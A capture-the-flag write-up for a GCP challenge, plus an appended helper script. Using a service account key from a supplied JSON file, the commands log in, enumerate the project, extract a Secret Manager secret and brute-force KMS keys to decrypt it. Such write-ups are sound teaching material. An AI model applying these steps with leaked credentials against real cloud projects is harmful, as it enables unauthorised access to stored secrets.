Tags: gcp cloud
Rating:
# writeup
Write up for the `Lost n Found` challenge
## Enumeration #1
Check what we can do with the attached file `legacy.json`. Inside this file we can see credentials for a service account in GCP:
* service account: `legacy-svc-account@ductf-lost-n-found.iam.gserviceaccount.com`
* project id: `ductf-lost-n-found`
With the commands below we can log in to the GCP project `ductf-lost-n-found`:
```bash
gcloud auth activate-service-account --key-file=legacy.json
gcloud config set project ductf-lost-n-found
```
## Enumeration #2
The next step is to check all resources the service account above is able to use. For this enumeration we used the `gcloud` CLI and tried to list resources for every API we could think of. Most of the APIs in GCP were disabled, but...
After enumeration we can see that only the `secrets` and `kms` APIs are enabled in the `ductf-lost-n-found` project, and the service account `legacy-svc-account@ductf-lost-n-found.iam.gserviceaccount.com` has access to these resources.
## Enumeration #3
Based on the `Enumeration #2` research we can extract the secret into the `secret_enc` file and save the names of all available keys:
```bash
gcloud secrets list
gcloud secrets versions access latest --secret="unused_data" |base64 -d >secret_enc
gcloud kms keyrings list --location australia-southeast2 # we know CTF is played in Australia
gcloud kms keys list --keyring projects/ductf-lost-n-found/locations/australia-southeast2/keyRings/wardens-locks |tail -n +2 |awk '{ print $1 }' |sed 's/^.*cryptoKeys\///g' >keys
```
## Check the final flag
Now we have the `keys` file with the list of all available keys and the `secret_enc` file with the secret in encrypted form, so we can try each key in turn to decrypt the secret.
```bash
# Try every key name from the keys file; a successful decrypt writes the plaintext to secret_dec
while read -r key; do
  gcloud kms decrypt --key "$key" --ciphertext-file=secret_enc --plaintext-file=secret_dec \
    --location australia-southeast2 --keyring=wardens-locks 2>/dev/null && echo "decrypted with key: $key"
done < keys
cat secret_dec
```
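The same key trial as a small reusable script, added here as an example and not part of the original writeup: it reads key names (bare or as full resource paths) from the `keys` file, stops at the first key that decrypts `secret_enc`, and reports which one worked. The function names `key_name_from_resource`, `gcloud_decrypt` and `find_decrypting_key` are this example's own; the decrypt call itself is the `gcloud kms decrypt` command from the writeup.

```shell
#!/bin/sh
# Added example (not from the original writeup). Assumes the service account from
# legacy.json is already activated and `keys` holds one key per line.

# Strip the resource prefix, e.g. .../cryptoKeys/foo -> foo (what the sed in the writeup does).
key_name_from_resource() {
  printf '%s\n' "${1##*/}"
}

# Real decrypt: the gcloud call from the writeup, output silenced so only the exit code matters.
gcloud_decrypt() {
  gcloud kms decrypt --key "$1" --keyring wardens-locks --location australia-southeast2 \
    --ciphertext-file "$2" --plaintext-file "$3" >/dev/null 2>&1
}

# Try each key in $1 until one decrypts ciphertext $2 into plaintext $3.
# A different decrypt command can be passed as $4 (used for offline testing).
# Prints the winning key and returns 0; returns 1 if no key worked.
find_decrypting_key() {
  keys_file="$1"; ciphertext="$2"; plaintext="$3"; decrypt="${4:-gcloud_decrypt}"
  while IFS= read -r key || [ -n "$key" ]; do
    key="$(key_name_from_resource "$key")"
    [ -z "$key" ] && continue
    if "$decrypt" "$key" "$ciphertext" "$plaintext"; then
      printf '%s\n' "$key"
      return 0
    fi
  done < "$keys_file"
  return 1
}

# Stand-alone use with the files from the writeup (skipped when they are not present).
if [ -f keys ] && [ -f secret_enc ]; then
  if key="$(find_decrypting_key keys secret_enc secret_dec)"; then
    echo "decrypted with key: $key"; cat secret_dec
  else
    echo "no key decrypted secret_enc" >&2
  fi
fi
```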